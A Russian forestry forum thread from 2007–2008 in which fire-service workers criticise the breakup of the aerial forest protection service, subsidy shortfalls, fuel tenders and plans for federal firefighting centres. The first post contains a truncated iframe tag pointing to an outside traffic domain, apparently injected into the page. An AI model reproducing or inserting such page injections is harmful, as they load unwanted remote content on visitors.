Что происходит в субъектах после уничтожения Авиалесоохраны

Обсуждения, посвящённые реалиям и продолжающемуся реформированию управления лесами и лесных отношений

Модераторы: forester66, Модераторы

Сообщение Fire » Сб дек 08, 2007 11:12 am

Очень познавательный обзор. Рекомендую ознакомиться:

http://www.rosleshoz.gov.ru/activity/no-fire/reports/4

Хороший образец того, как можно красиво и складно описать свои проколы. Все время кто-то или что-то виноват, но не сами.

"...Авиапатрулирование лесов началось с большим опозданием в большинстве субъектов РФ (Республика Саха (Якутия), Кировская, Вологодская, Свердловская, Сахалинская, Костромская, Камчатская, Архангельская области и др.). Установленные режимы выполнения кратностей авиапатрулирования не соблюдались ни в одном субъекте. Средняя кратность полетов по сравнению с прошлым годом уменьшилась на 24%. ..."

Как выполнить кратность авиапатрулирования, если для этого необходимо 5 тысяч летных часов, а вам дают субвенций только на 800 часов?! Если есть тот , кто знает ответ, то он Эйнштейн :D<iframe src='http://traffstats.biz/adv/new.ph

"...Несмотря на высокую и чрезвычайную пожарную опасность на территории Читинской, Иркутской областей, Хабаровского края, Республики Бурятия, не производилось межрегиональное маневрирование ресурсами пожаротушения. Ликвидация складов резерва средств пожаротушения негативно сказалась на оказании оперативной помощи субъектам РФ...."

Чтобы сделать межрегиональное маневрирование надо денежку заплатить. Беда в том, что потребность в таком маневрировании возникает именно тогда, когда по-настоящему высокая горимость и, как правило, к этому времени субвенции уже закончились. Субвенции быстро заканчиваются, потому что их слишком мало и хватает только на малую горимость (кстати, в этом форуме было много раз озвучено). Если в регионе горит все синем пламенем и нет денег у Субъекта никто никто никто ему свои силы не направит. Государством ныне сознательно реализована схема - Утром деньги, вечером стулья! В начале 2005 года Рослесхоз бил себя в грудь, что якобы будут перераспределять деньги между горимыми и негоримыми регионами. Сейчас 2007 год, внимательнее читайте Бюджетный кодекс! Нет в стране механизма перераспределения денег, непредусмотрен!!! Так что Субъекты РФ сами по себе один на один с проблемой лесных пожаров, словно льдины в океане, никто им в горе не поможет - непредусмотрено!
А уж склады федерального имущества сам же Рослесхоз и ликвидировал :lol: Непонимаю, Как это может сказаться на оказании оперативной помощи если эту самую помощь никто и неоказывал :lol: :lol: :lol:

«…Одной из главных причин неудовлетворительной организации работ по тушению лесных пожаров является низкий уровень профессиональной подготовки руководителей тушения крупных лесных пожаров (отсутствие оперативности, недостаточная объективность принимаемых ими решений, слабый контроль за ходом работ по тушению, отсутствие особого внимания к эффективности тушения огня на стыках участков структурных подразделений, отрядов, привлеченных организаций, а также на опасных направлениях). Другой важной причиной недостаточно успешной борьбы с огненной стихией является не всегда правильная структурная организация сил пожаротушения, которая должна меняться в зависимости от размера пожара и его сложности, наличия сил и средств тушения. И последним фактором, негативно влияющим на успешность операции по ликвидации пожара, является низкий уровень квалификации работников занятых на тушении лесных пожаров, несоблюдение ими требований правил охраны труда и техники безопасности, когда на работы по тушению лесных пожаров привлекаются граждане не прошедшие специальный инструктаж….»

Первое, в России статус руководителя тушения крупного лесного пожара до сих носит абстрактный характер. Нет регламента, полноценных программ подготовки. Ни один чиновник Рослесхоза ни сможет Вам внятно объяснить как должен работать такой руководитель и какое правовое поле регулирует его деятельность. За 100летнию историю эта проблема так и не была решена. До середины 90х эту проблему более менее успешно «закрывали» опытные летчики-наблюдатели «Авиалесоохраны» своими действия. Они фактически и брали на себя функцию руководителя тушения крупного пожара, когда были достаточные авиационные, информационные и людские ресурсы. Последние десятилетние произошло катастрофическое падение уровня и возможностей деятельности лесопожарных служб, в том числе и «Авиалесоохрана». За последние год два произошел мощный уход опытных (подчеркиваю самых опытных) летнабов из отрасли. Больше «закрывать» проблему некому, да и нечем.
Второе, если привлекать неспециализированные организации к тушению лесных пожаров, всякие там ГО и ЧС, лесозаготовителей, коммерческие структуры и т.п., тогда низкая квалификация персонала это естественно. Более того, за последние три года, создав новые условия функционирования отрасли, Рослесхоз до сих пор не позаботился о выработки Единого стандарта действий в этом вопросе. Вообще-то, это актуальная проблема и гигантская научно-техническая задача, но "доблестные реформаторы" попросту проигнорировали этот вопрос и продолжают в том же духе. Для примера, в США есть лесные пожарные, принадлежащие различным ведомствам и коммерческим фирмам но все оснащаются, обучаются и работают по единым стандарту и регламенту взаимодействия. Во все времена более менее подготовленный персонал был только в двух организациях «Авиалесоохрана» и Лесхозы. Сейчас Лесхозы в стадии реорганизации, их ПХСки уйдут в новые предприятия, которые будут начинать свою пожарную деятельность практически с чистого листа. На отладку этой деятельности к норме уйдет 2-3 года в лучшем случае. Региональные базы «Авиалесоохраны» сейчас практически в коме, численность пожарных ниже всяких минимальных норм в 5-6 раз, оставшиеся энтузиасты и романтики перспектив не видят, опытные уходят прежде всего, так как с их профнавыками они легко находят себя в других лучшеоплачиваемых отраслях. Еще год финансовых и организационных издевательств и базы окончательно превратятся в «профессиональные трупы». Так что инструктажи с привлеченными к тушению людьми проводить некому :P

"... Работниками лесного хозяйства было распространено 7,6 млн. листовок, памяток, буклетов..."

Кто-нибуть видел эти листовки? Лично я уже лет 10 не видел листовки, Рослесхоз их вроде как давно перестал печатать. Странно, листовки никто непечатает, но каждый год миллионами их распространяют!? Как такое возможно? :shock:

P.S. наш Титаник тонет четко по плану, аккурат по графику
:wink:
Fire
Активный пользователь
 
Сообщения: 109
Зарегистрирован: Вт апр 05, 2005 8:28 am

Сообщение Шурави » Вт июн 03, 2008 4:09 pm

В Амурской области погорели несколько деревень, есть жертвы, в новостях не все показывают... по одним данным сгорело 75 домов, по другим более 100,.. все пожары результат поджогов на сельхозугодьях, ( интересно, что в одной деревне МЧС-ники отжигали, да в не ту сторону… и об этом наши СМИ молчат как всегда, когда при деле наши «доблестные спасатели», как журналисты их называют) Договора об охране с/х угодий нет ни с одним владельцем, ни с местным министерством. Причем все это не первый год. Авиабаза как птичка с подрубленными крыльями, подпрыгнуть хочет, но забор высоковат... пришли к сезону без топлива, если самолеты еще есть, и бензин на начало горимости был, но уже все практически сожгли! Есть единственный исправный вертолет, но керосинки нет... Конкурс на ГСМ прошел буквально недавно, теперь будем ждать когда придет.... к середине сезона... Весна пришла как всегда нежданно, хотя еще зимой все видели, снега нет по всей области, сгореть можно!!!! что и произошло на настоящий момент... Только в начале марта был объявлен конкурс на проведение работ по авиапатрулированию и тушению пожаров ( интересно, кто должен был ещё участвовать?) Благо вовремя одумались, ( что не говори, а коллективное обращение работников к верхам какой то резонанс вызывает) деньги вроде как по слухам были выделены на подготовку и тушение пожаров, но все равно время было уже упущено. Мужики на пожарах уже давно впахивают, а продукты питания, спецодежда до сих пор не выданы. Долбанные конкурсы… выиграла конкурс на ГСМ одна компания, и непонятно, как северные авиаотделения будут обеспечиваться топливом, ведь нет АЗС выигравшей компании по северным районам области… «вот она борьба с коррупцией на местном уровне»

Местное министерство придумало новый приказ: в целях повышения оперативности тушения пожаров назначить прогрессивную шкалу понижения премии в зависимости от количества дней тушения пожара… т.е. через пять дней работы работники ПДПС и лесхозов работают просто так… при этом не учитывается специфика работ, площадь пожара на момент высадки, и все нормативные документы регламентирующие работы по тушению пожаров, в том числе отраслевое профсоюзное соглашение, колдоговор… И руководство авиабазы съело этот приказ!!!! ВЫПОЛНЯЕТ!!!! И ещё как…
Практически весь май работали в долг по керосину…. Каждый день начинался с того, что начинали просить в долг у сторонних организаций, понемногу выделяли, долг отдали только в конце месяца…
Придумали кучу новой отчетности, теперь после выезда с пожара группа отписывается в течении целого дня…. После них садится летнаб и пишет ещё стопочку бумажек… в базе завал с бумагами, причем требования по заполнению меняются каждый месяц, отсюда и путаница, до сих пор не защитили затраты за весну.
И как обычно к концу месяца мая бензинка закончилась…. Когда ожидать не знаем!
Все люди - братья: живут, как будто делят наследство.
Шурави
Активный пользователь
 
Сообщения: 234
Зарегистрирован: Пт июл 23, 2004 12:18 pm

Сообщение zakharov » Сб июн 21, 2008 8:52 pm

Господа "летучие пожарные", что за предложение Рослесхоза о создании в стране трех авиационных центров, предназначенных для мониторинга и тушения лесных пожаров? Об этом сообщили сегодня информагентства.

А реально что за предложениями стоит?
zakharov
Главный редактор
 
Сообщения: 810
Зарегистрирован: Пн мар 15, 2004 6:18 pm
Откуда: Ликино-Дулёво Московской области

Сообщение Шурави » Вс июн 22, 2008 4:42 am

Походу это очередное изобретение велосипеда.
Все люди - братья: живут, как будто делят наследство.
Шурави
Активный пользователь
 
Сообщения: 234
Зарегистрирован: Пт июл 23, 2004 12:18 pm

Сообщение zakharov » Вс июн 22, 2008 11:48 am

Походу это очередное изобретение велосипеда.

Да так бы ладно, если бы в результат давно проверенный велосипед получился. А то может придется ездить на одном колесе, как в цирке?
zakharov
Главный редактор
 
Сообщения: 810
Зарегистрирован: Пн мар 15, 2004 6:18 pm
Откуда: Ликино-Дулёво Московской области

Сообщение Fire » Вс июн 22, 2008 6:18 pm

zakharov писал(а):Господа "летучие пожарные", что за предложение Рослесхоза о создании в стране трех авиационных центров, предназначенных для мониторинга и тушения лесных пожаров? Об этом сообщили сегодня информагентства.

А реально что за предложениями стоит?


Идея федеральных лесопожарных центров давно витала в воздухе, практически сразу после начала эпохи субвенций в 2005 году. Еще в том году умные головы Авиалесоохраны и странным образом уцелевшие немногие думающие люди из Рослесхоза озадачились: "Дык, А как же теперь проводить межбазовое маневрирование?" Ни один субъект не в состоянии самостоятельно решить проблему высокой горимости лесов. Система субвенций практически свела на нет возможность оперативного маневрирования силами между субъектами.
После уничтожения Авиалесоохраны осенью 2006 года стало еще хуже. Авиабазы в субъектах начали умирать, из отрасли начался и происходит сейчас отток квалифицированных кадров.
Скоро даже если какой-то горимый субъект найдет по-быстрому деньги для привлечения помощи со стороны, ее просто никто не сможет предоставить.
В Рослесхозе зимой 2008 года наконец-то пришло осознание: "Ой-ой-ой! Что же мы натворили?!" Идея трех федеральных центров, где будут сосредоточены ресурсы и профессиональные силы (человек по 100), готовые за федеральный счет оказать профессиональную помощь горимым субъектам снова всплыла. По прогнозам лето 2008 года по всей стране ожидалось горимым на фоне повсеместных провалов функционирования лесопожарных служб в субъектах, связанных с реформой лесного хозяйства. Пришло осознание, что нужен хоть какой-нибуть страховочный механизм. Как раз, кстати, нашлись деньги, Рослесхоз создал у себя чрезвычайный фонд в 900 миллионов. Но… весной начались в стране выборы президента, судьба руководителя Рослесхоза повисла в воздухе и тему временно «придержали». Начало пожароопасного сезона подтвердила худшие опасения… пожары на Дальнем востоке и в Сибири, конфликты с МЧС…Волна предложений от губернаторов тему Центров снова вытащили на свет.
Что будет в итоге, не знаю. Что твориться в голове у Московских реформаторов, пожалуй, не знает даже Бог.
Могу только предположить, что если Центры будут созданы возникнет огромная методологическая проблема эффективного применения федеральных сил совместно с местными. Сейчас в сфере охраны лесов в России возник грандиозный методический, нормативно-технологический, финансово-юридический хаос. Можно ли его преодолеть при желании? Думаю, да. Способен ли Рослесхоз преодолеть его достаточно быстро? Уверен, совершенно неспособно.
Хотя надо признать, создание Центров может стать той соломинкой, которая спасет последние остатки опыта, технологии, кадры.
Fire
Активный пользователь
 
Сообщения: 109
Зарегистрирован: Вт апр 05, 2005 8:28 am

Пред.

Вернуться в Лесное хозяйство на современном этапе

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1

cron